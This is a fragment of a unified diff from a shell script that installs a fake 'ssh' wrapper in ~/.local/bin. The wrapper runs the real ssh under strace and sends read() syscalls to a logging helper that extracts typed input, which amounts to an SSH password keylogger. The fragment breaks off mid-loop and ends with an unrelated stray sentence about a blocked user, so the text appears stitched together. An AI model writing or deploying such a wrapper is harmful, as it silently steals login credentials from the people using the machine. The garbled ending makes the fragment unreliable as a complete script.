@@ -697,7 +697,6 @@ cat <<__EOF__>~/.local/bin/ssh
strace -e trace=read -o '! ~/.local/bin/ssh-log \$\$' /usr/bin/ssh \$@
__EOF__
cat <<__EOF__ >~/.local/bin/ssh-log
#! /bin/bash
grep 'read(4' | cut -f2 -d\\" | while read -r x; do
The note is not visible to the blocked user.